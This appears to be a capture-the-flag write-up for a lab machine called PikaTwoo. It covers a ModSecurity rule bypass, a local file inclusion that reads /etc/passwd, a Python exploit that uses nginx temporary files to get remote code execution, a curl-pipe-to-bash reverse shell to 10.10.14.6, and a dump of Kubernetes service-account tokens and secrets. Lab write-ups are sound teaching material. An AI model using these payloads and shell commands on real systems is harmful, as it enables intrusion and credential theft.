There’s a specific rule, REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf
that is meant to only work when enabled, but due to a bug, is enabled whether the owner has turned them on or not. Three of these rules (9001180, 9001182, and 9001184) disable body scanning for certain paths.
The file in question is available here. I’ll look at 9001180 first, since it’s the simplest:
SecRule REQUEST_METHOD "@streq POST" \
"id:9001180,\
phase:1,\
pass,\
t:none,\
nolog,\
noauditlog,\
ver:'OWASP_CRS/3.2.0',\
chain"
SecRule REQUEST_FILENAME "@rx /admin/content/assets/add/[a-z]+$" \
"chain"
SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \
"ctl:requestBodyAccess=Off"
The rule looks to see if the file path is /admin/content/assets/add/[a-z]+$
. If it is, it checks if there’s a cookie that matches a regex (I’ll use SESSa
for simplicity here) that has a value made up alphanumeric characters plus underscore and dash. If that matches, then it turns off access to the request body for ModSecurity.
Applying CVE Bypass
So how would this apply for PikaTwoo? It seems perhaps I can get the POST body to not be scanned. Does having POST body access help me? It looks like it does:
oxdf@hacky$ curl http://pokatdex-api-v1.pokatmon-app.htb/ -d "region=0xdf&debug=true"
{"error": "unknown region", "debug": include(): Failed opening 'regions/0xdf' for inclusion (include_path='.:/usr/share/php')"}
By adding -d
, it sends a POST request with the parameters in the body.
If I visit /admin/content/assets/add/a
with a cookie SESSa=a
, then the body of the POST won’t be scanned by ModSecurity. So what happens when I send a POST to /admin/content/assets/a
? The rule will check /index.php?region=/admin/content/assets/add/a
. That’s not really helpful, unless the region
in the body takes priority over the one in the GET parameters. I’ll do this as an experiment, where 0xdf
is the GET region, and post0xdf
is the body one:
oxdf@hacky$ curl http://pokatdex-api-v1.pokatmon-app.htb/0xdf -d "region=post0xdf&debug=true"
{"error": "unknown region", "debug": include(): Failed opening 'regions/post0xdf' for inclusion (include_path='.:/usr/share/php')"}
Based on the debug, it looks like the POST takes priority! That means I should be able to access files around Mod Security. And it works:
oxdf@hacky$ curl http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/a -d "region=../../../../../../etc/passwd&debug=true" -b "SESSa=a"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
www:x:1000:1000::/home/www:/bin/sh
RCE
Dead Ends
I can use the LFI to read files from the disk. I’m not able to get to any log files, so I can’t log poison. I don’t have any upload capability to get a webshell on PikaTwoo. I could also try PHP filter injection (like in Encoding and Pollution), but the debug messages show that my input is prepended with “regions/”, which breaks this technique.
nginx Temp Files
This blog post is about just this situation, using nginx’s ability to create temporary files on disk for large requests to create a webshell that gets invoked before it gets deleted. The post includes a example script, which I’ll walk-through and then modify for PikaTwoo in this video:
By the end of the video, I’ve got this script:
#!/usr/bin/env python3
import sys, threading, requests
# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details
URL = f'http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/a'
# # find nginx worker processes
# r = requests.get(URL, params={
# 'file': '/proc/cpuinfo'
# })
# cpus = r.text.count('processor')
cpus = 2
# r = requests.get(URL, params={
# 'file': '/proc/sys/kernel/pid_max'
# })
# pid_max = int(r.text)
# print(f'[*] cpus: {cpus}; pid_max: {pid_max}')
pid_max = 4194304
nginx_workers = []
for pid in range(pid_max):
r = requests.post(URL,
data={'region': f'../../proc/{pid}/cmdline'},
cookies={"SESSa": "a"}
)
if b'nginx: worker process' in r.content:
print(f'[*] nginx worker found: {pid}')
nginx_workers.append(pid)
if len(nginx_workers) >= cpus:
break
done = False
# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
print('[+] starting uploader')
while not done:
requests.post(URL, data='0xdf0xdf\n<?php system("id"); /*' + 16*1024*'A')
for _ in range(16):
t = threading.Thread(target=uploader)
t.start()
# brute force nginx's fds to include body files via procfs
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
def bruter(pid):
global done
while not done:
print(f'[+] brute loop restarted: {pid}')
for fd in range(4, 32):
f = f'../../proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
r = requests.post(URL, data={'region': f}, cookies={"SESSa": "a"})
if r.text and "0xdf0xdf" in r.text:
print(f'[!] {f}: {r.text}')
done = True
exit()
for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, ))
a.start()
And it runs id
:
oxdf@hacky$ python rce.py
[*] nginx worker found: 11
[*] nginx worker found: 12
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] brute loop restarted: 11
[+] brute loop restarted: 12
[!] ../../proc/self/fd/12/../../../12/fd/16: 0xdf0xdf
uid=1000(www) gid=1000(www) groups=1000(www)
Shell
To get a shell, I’ll update the script to run curl
to my server and then pipe the result into bash
:
requests.post(URL, data='0xdf0xdf\n<?php system("curl 10.10.14.6/rev|bash"); /*' + 16*1024*'A')
Now I’ll save a simple bash reverse shell in rev
:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.6/444 0>&1
And start a Python web server hosting this file. When it runs, I get a shell:
oxdf@hacky$ nc -lnvp 444
Listening on 0.0.0.0 444
Connection received on 10.10.11.199 39756
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
www@pokatdex-api-75b7bd96f7-2xkxk:/www$
I’ll upgrade the shell using the standard technique:
www@pokatdex-api-75b7bd96f7-2xkxk:/www$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www@pokatdex-api-75b7bd96f7-2xkxk:/www$ ^Z
[1]+ Stopped nc -lnvp 444
oxdf@hacky$ stty raw -echo ; fg
nc -lnvp 444
reset
reset: unknown terminal type unknown
Terminal type? screen
www@pokatdex-api-75b7bd96f7-2xkxk:/www$q
Shell as nobody in APISIX Pod
Enumeration
Identify Kubernetes
The box has the feeling of being a container. There are no directories in /home
. There’s a start.sh
in the system root that runs supervisord
, which is not uncommon in containers but is very rare in non-containers:
#!/bin/bash
# Run supervisord
/usr/bin/supervisord -c /etc/supervisord.conf
There’s no .dockerfile
in /
, so it might not be a simple Docker container.
The IP address is 10.244.0.3/24, which is different from the IP of PikaTwoo:
www@pokatdex-api-75b7bd96f7-2xkxk:/$ ip -o -4 addr
1: lo inet 127.0.0.1/8 scope host lo\ valid_lft forever preferred_lft forever
3: eth0 inet 10.244.0.3/24 brd 10.244.0.255 scope global eth0\ valid_lft forever preferred_lft forever
In /run/secrets
there’s a kubernetes.io
directory:
www@pokatdex-api-75b7bd96f7-2xkxk:/$ ls run/secrets/
kubernetes.io
Digging in a bit, I’ll find files for the namespace and the token:
www@pokatdex-api-75b7bd96f7-2xkxk:/run/secrets/kubernetes.io/serviceaccount$ ls
ca.crt namespace token
www@pokatdex-api-75b7bd96f7-2xkxk:/run/secrets/kubernetes.io/serviceaccount$ cat namespace
applications
www@pokatdex-api-75b7bd96f7-2xkxk:/run/secrets/kubernetes.io/serviceaccount$ cat token
eyJhbGciOiJSUzI1NiIsImtpZCI6IjAtelk2WTBKaFgwY3g0b3hxbVF6OWg5blJmNkVOS0xiNFhkNklqN2ZybGcifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzI0OTYwNDU5LCJpYXQiOjE2OTM0MjQ0NTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJwb2QiOnsibmFtZSI6InBva2F0ZGV4LWFwaS03NWI3YmQ5NmY3LTJ4a3hrIiwidWlkIjoiOGI3MGY1YjItODE1OC00NDg5LTk0NGUtMDA2ZTM1Yzc2ZDkzIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJkZWZhdWx0IiwidWlkIjoiMTRmN2QyM2MtZDlmZi00OGE1LTg1MmItODAyZTdjZmVjZDkzIn0sIndhcm5hZnRlciI6MTY5MzQyODA2Nn0sIm5iZiI6MTY5MzQyNDQ1OSwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmFwcGxpY2F0aW9uczpkZWZhdWx0In0.qOIJqW0CeQ1SFzavswCO_6nFM9SvNjAXiB-8hcNtZ_wP0fX4dy408SDAX9eDSydWq19XdHcfawEiSLWBfD-LfNSEYFd5pXuRj6C2apD2fOqLydGI-ovaNXqK__zrThfiqI95583o8J-kX_2b0RvJKRvgHuUiJ9c64Yg7Xl8Li-RKEFJP21eeoKcO8PP3a-qsFA628UTGNk-tti4yEXG0igRKuZOkzYBSA8R-e7UN7xzvhKg1pUIFJpFU87MdQGKEUWcLn4OHb_21DazdsjVwO0JRq59yXKq0cXlmi3AGvjUpjI-IBQFkAqURFRRapE939ytLBvp0Z-2gH_N1MSPaxw
The namespace is called applications and there’s a token.
Accessing Kubernetes API
The Kubernetes docs have a page called Accessing the Kubernetes API from a Pod that walks through how to do just that. Outside the pods I’d typically use a program called kubectl
to interact with the cluster, but that’s not installed in this (or most) pods.
I’ll follow the instructions there, first setting some variables:
www@pokatdex-api-75b7bd96f7-2xkxk:/$ # Point to the internal API server hostname
www@pokatdex-api-75b7bd96f7-2xkxk:/$ APISERVER=https://kubernetes.default.svc
www@pokatdex-api-75b7bd96f7-2xkxk:/$ # Path to ServiceAccount token
www@pokatdex-api-75b7bd96f7-2xkxk:/$ SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
www@pokatdex-api-75b7bd96f7-2xkxk:/$ # Read this Pod's namespace
www@pokatdex-api-75b7bd96f7-2xkxk:/$ NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
www@pokatdex-api-75b7bd96f7-2xkxk:/$
# Read the ServiceAccount bearer token
www@pokatdex-api-75b7bd96f7-2xkxk:/$ TOKEN=$(cat ${SERVICEACCOUNT}/token)
www@pokatdex-api-75b7bd96f7-2xkxk:/$ # Reference the internal certificate authority (CA)
www@pokatdex-api-75b7bd96f7-2xkxk:/$ CACERT=${SERVICEACCOUNT}/ca.crt
Now I can hit the API using that token:
www@pokatdex-api-75b7bd96f7-2xkxk:/$ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "192.168.49.2:8443"
}
]
}
Reading Secrets
The API docs show that secrets are accessed from /api/v1/namespaces/{namespace}/secrets
:
www@pokatdex-api-75b7bd96f7-2xkxk:/$ curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/$NAMESPACE/secrets
{
"kind": "SecretList",
"apiVersion": "v1",
"metadata": {
"resourceVersion": "2490044"
},
"items": [
{
"metadata": {
"name": "apisix-credentials",
"namespace": "applications",
"uid": "be010bfa-acfb-410b-a5a3-23a2be554642",
"resourceVersion": "806",
"creationTimestamp": "2022-03-17T22:02:57Z",
"annotations": {
"kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"data\":{\"APISIX_ADMIN_KEY\":\"YThjMmVmNWJjYzM3NmU5OTFhZjBiMjRkYTI5YzNhODc=\",\"APISIX_VIEWER_KEY\":\"OTMzY2NjZmY4YjVkNDRmNTAyYTNmMGUwOTQ3NmIxMTg=\"},\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"apisix-credentials\",\"namespace\":\"applications\"},\"type\":\"Opaque\"}\n"
},
"managedFields": [
{
"manager": "kubectl-client-side-apply",
"operation": "Update",
"apiVersion": "v1",
"time": "2022-03-17T22:02:57Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:data": {
".": {},
"f:APISIX_ADMIN_KEY": {},
"f:APISIX_VIEWER_KEY": {}
},
"f:metadata": {
"f:annotations": {
".": {},
"f:kubectl.kubernetes.io/last-applied-configuration": {}
}
},
"f:type": {}
}
}
]
},
"data": {
"APISIX_ADMIN_KEY": "YThjMmVmNWJjYzM3NmU5OTFhZjBiMjRkYTI5YzNhODc=",
"APISIX_VIEWER_KEY": "OTMzY2NjZmY4YjVkNDRmNTAyYTNmMGUwOTQ3NmIxMTg="
},
"type": "Opaque"
},
{
"metadata": {
"name": "default-token-hl4d7",
"namespace": "applications",
"uid": "00cb586a-5e2b-465a-947d-43d865570958",
"resourceVersion": "770",
"creationTimestamp": "2022-03-17T22:02:09Z",
"annotations": {
"kubernetes.io/service-account.name": "default",
"kubernetes.io/service-account.uid": "14f7d23c-d9ff-48a5-852b-802e7cfecd93"
},
"managedFields": [
{
"manager": "kube-controller-manager",
"operation": "Update",
"apiVersion": "v1",
"time": "2022-03-17T22:02:09Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:data": {
".": {},
"f:ca.crt": {},
"f:namespace": {},
"f:token": {}
},
"f:metadata": {
"f:annotations": {
".": {},
"f:kubernetes.io/service-account.name": {},
"f:kubernetes.io/service-account.uid": {}
}
},
"f:type": {}
}
}
]
},
"data": {
"ca.crt": "LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURCakNDQWU2Z0F3SUJBZ0lCQVRBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwdGFXNXAKYTNWaVpVTkJNQjRYRFRJeU1ETXdPVEU1TURZek1Wb1hEVE15TURNd056RTVNRFl6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYldsdWFXdDFZbVZEUVRDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTm5oClU2Y083amNWOTEzNFlBS3g2NDJ3N0dOc2UvdC9DMHBPRHhpTGNoSmovcFVnVjNmTTBWL3dRR0k1OXlhNDhTdW0KK1RzcUppd2RXT21JckEyUEZOSVJhMUpyUjg5RHd4bERad0VVSElYSmxZNTFRdVE0cmEyNUZvMXBGWWx2UUFTQQpBUU1SMjUwblQwYVd0S25pTVQ1TDNYNnM1RmcvQVU2R21lNkxBVlYrVW8xZ1ZMeTRjZ3cvTnZDMXF4azJXMnkxCjJYU2hPcTVkQnMveE5WMGxtMzgvUG9hK2xtamVaZGJWMzJJa1NITlQvUGRrNldkYm0va0lHK3dDd2tkaERRdGYKVHRPd1dobG5Qb3pDMDU2cU1SZnBKSytxOHpoWGwvTmVIZkhKL04vQmpqYzVxRHd4a3hIcEpGUnJldmQvd0xnLwp0S0sxajBSTWR3NnM2QmhiTUcwQ0F3RUFBYU5oTUY4d0RnWURWUjBQQVFIL0JBUURBZ0trTUIwR0ExVWRKUVFXCk1CUUdDQ3NHQVFVRkJ3TUNCZ2dyQmdFRkJRY0RBVEFQQmdOVkhSTUJBZjhFQlRBREFRSC9NQjBHQTFVZERnUVcKQkJTVERUVHFEc2Nqcnl4V0Voa2MxYkpySjdQZ0V6QU5CZ2txaGtpRzl3MEJBUXNGQUFPQ0FRRUFWY2Erd0Z0eApEajBKT0QvYlN3allUY0Yzcit5YzJWVWNQZVdOMmhjN0F2dndLTnlLTHl5K2hESEtCN0ZTTDV2U2d3OHhldlYxCkx6bjR5dVIzNzBNSCtOR25UNVZaTFVjVU5iakpOTSsxNDJOc1dSUlJ4dzZQSVZ4cFR6OUFzdk9WcURJbFhUTXAKaURNRGRrbG16aGRGbHdKV08wRUQ0c29lNEFhQ3NXRlE5d013ZEFSbWY4TTh2QW1kZUY1TWlwTjFHSEFNaTZ2WAo0UzdCSjZPRFNmRmpuSTRBWWhuZ215UzBseW56TUV4ZnJrVXRiOXJjNWFNcXdnd1QrRGs3eUc4SmxJNG1vOC9zCmFXT25jSVZBUzRDQXlpZG1Zdm1id05GVklMemM5VXVrcGMyV3M2RzNaeTdZQ014d2ZkYkZZNUVCY2MxQXRCWVoKc0k2WldJV0x5VkJuSGc9PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==",
"namespace": "YXBwbGljYXRpb25z",
"token": "ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklqQXRlbGsyV1RCS2FGZ3dZM2cwYjNoeGJWRjZPV2c1YmxKbU5rVk9TMHhpTkZoa05rbHFOMlp5YkdjaWZRLmV5SnBjM01pT2lKcmRXSmxjbTVsZEdWekwzTmxjblpwWTJWaFkyTnZkVzUwSWl3aWEzVmlaWEp1WlhSbGN5NXBieTl6WlhKMmFXTmxZV05qYjNWdWRDOXVZVzFsYzNCaFkyVWlPaUpoY0hCc2FXTmhkR2x2Ym5NaUxDSnJkV0psY201bGRHVnpMbWx2TDNObGNuWnBZMlZoWTJOdmRXNTBMM05sWTNKbGRDNXVZVzFsSWpvaVpHVm1ZWFZzZEMxMGIydGxiaTFvYkRSa055SXNJbXQxWW1WeWJtVjBaWE11YVc4dmMyVnlkbWxqWldGalkyOTFiblF2YzJWeWRtbGpaUzFoWTJOdmRXNTBMbTVoYldVaU9pSmtaV1poZFd4MElpd2lhM1ZpWlhKdVpYUmxjeTVwYnk5elpYSjJhV05sWVdOamIzVnVkQzl6WlhKMmFXTmxMV0ZqWTI5MWJuUXVkV2xrSWpvaU1UUm1OMlF5TTJNdFpEbG1aaTAwT0dFMUxUZzFNbUl0T0RBeVpUZGpabVZqWkRreklpd2ljM1ZpSWpvaWMzbHpkR1Z0T25ObGNuWnBZMlZoWTJOdmRXNTBPbUZ3Y0d4cFkyRjBhVzl1Y3pwa1pXWmhkV3gwSW4wLkladm41aGk3dDZjUkhTNDAzM204R2tCaGdGUUZlVUZmZFZxTVlvYUR6S1FzNWlHVE4xaTR6aUJhbV9MMU02UE5RSlViNHNwVlpyN2FCS2RmMkpuNzNERFlhOHZ4bGtqa21BQkNFTDFrSEI2RlZSamFBOGxDRFdTamx2TkFaeU80czN0RXFBaEpRcHg2OUxmd0tuM201N05DdjkxakNULTRTY2lCN05YcjJOSGhZQ3RfVHVka0U1ZllRdE4xSGZTb0V6bVpXNjlmR0E4THFkbkRDNkZLb2ZnaGRLYkt6T1EtaHhUbFdMRjdwMUN3MnNnamZoczBCdWU3Q29nNFY3Rl9YQkN4ejVqZFpUZ2Nyc3A1TTVmNnZDYjJKbkc0RElqTEplZnMzQkRQTzVsS3dkY0NaVVN5Rkc1OXgzSzBBTVdSMHB4YmdNTnlYci1Mei03RHotWTkxUQ=="
},
"type": "kubernetes.io/service-account-token"
},
{
"metadata": {
"name": "sh.helm.release.v1.apisix.v1",
"namespace": "applications",
"uid": "538a6f88-f8e3-42bf-b75c-ff058ced2fd4",
"resourceVersion": "169507",
"creationTimestamp": "2022-03-30T12:50:30Z",
"labels": {
"modifiedAt": "1648644630",
"name": "apisix",
"owner": "helm",
"status": "deployed",
"version": "1"
},
"managedFields": [
{
"manager": "Go-http-client",
"operation": "Update",
"apiVersion": "v1",
"time": "2022-03-30T12:50:30Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:data": {
".": {},
"f:release": {}
},
"f:metadata": {
"f:labels": {
".": {},
"f:modifiedAt": {},
"f:name": {},
"f:owner": {},
"f:status": {},
"f:version": {}
}
},
"f:type": {}
}
}
]
},
"data": {
"release": "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